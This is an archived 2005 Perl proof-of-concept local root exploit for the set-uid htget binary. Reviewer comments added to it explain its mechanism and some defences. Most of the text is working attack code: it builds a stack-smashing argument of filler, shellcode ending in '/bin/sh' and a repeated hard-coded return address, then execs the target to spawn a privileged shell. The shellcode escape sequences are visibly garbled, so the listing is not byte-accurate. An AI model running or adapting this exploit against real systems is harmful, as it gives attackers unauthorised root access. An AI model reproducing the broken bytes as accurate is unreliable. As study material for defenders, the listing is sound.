#!/usr/bin/perl
#^^^^^^^^^^^^^^^^....,,,,|:::::::____******
#HTGET <= 0.9.x local lame r00t exploit *
#written by nekd0 of Unl0ck Research Team *
#(c) .unl0ck research team 2004-2005. *
# http://unl0ck.void.ru *
#................/^^^^''''|:::::::----******
# Archived proof-of-concept (2005) targeting the set-uid htget binary named in
# the header. The script builds one long argument (filler, payload, then a
# repeated 32-bit address) and execs the target with it. That layout looks like
# a classic stack-smashing input; the vulnerable code path in htget itself is
# not shown on this page.
#
# NOTE(review): the string literals below are kept exactly as they appear on
# the page. Their escape sequences appear to have lost characters in
# extraction, so this listing is not a byte-accurate copy of the original.
#
# Defensive takeaways visible from this listing:
#   - The script only proceeds if the target carries the set-uid bit (the -u
#     test below), so removing that bit from htget, or removing the package,
#     takes away the privilege boundary it relies on.
#   - The address is a hard-coded constant tuned for one distribution (see the
#     author's "red hat 9.0" remark); presumably it depends on a fixed stack
#     layout, which address-space randomisation is meant to break.
#   - The payload travels as a command-line argument, so exec auditing of
#     set-uid binaries started with very long arguments would record it.

# Payload string; it ends in the literal "/bin/sh". Presumably it spawns a
# shell after resetting uid/gid. That is inferred, not verified from this
# listing.
$shellcode =
"x31xc0x31xdbxb0x17xcdx80".
"xb0x2excdx80xebx15x5bx31".
"xc0x88x43x07x89x5bx08x89".
"x43x0cx8dx4bx08x31xd2xb0".
"x0bxcdx80xe8xe6xffxffxff".
"/bin/sh";
# Loop bound used to size the argument built below.
$len = 288;
# Hard-coded address that is packed and repeated at the tail of the argument.
$ret = 0xbfffd62a; #red hat 9.0
# Filler unit appended in front of the payload.
$nop = "x90";
# Adjustment added to $ret; defaults to 0, overridable via the first argument.
$offset = 0 ;
# Absolute path of the target binary.
$vulnprog="/usr/bin/htget";
# Exactly one command-line argument replaces the default offset (no validation).
if (@ARGV == 1) {
$offset = $ARGV[0];}
# Bail out unless the target file has the set-uid bit; without it there is no
# privilege to gain.
if (!-u($vulnprog)){print "$vulnprog is not suid... exitingn";exit();}
# Filler: ($len - length($shellcode) - 100) copies of $nop.
for ($i=0; $i<($len-length($shellcode)-100);$i++)
{$buffer .= $nop;}
# Payload follows the filler.
$buffer .= $shellcode;
# Report the effective address ($ret + $offset) in hex.
print ("Address: 0x",sprintf('%lx',($ret+$offset)),"n");
# pack('l') emits the value as a native-endian signed 32-bit integer.
$new_ret = pack('l',($ret + $offset));
# $i carries over from the filler loop; it advances past the payload length and
# then steps by 4 up to $len, appending one packed address per step.
for ($i+=length($shellcode); $i<$len; $i+=4)
{$buffer .=$new_ret}
# Replace this process with the target, passing the buffer as its argument.
# This is the single-string form of exec, which Perl may hand to the shell.
exec("$vulnprog $buffer");
# milw0rm.com [2005-01-05]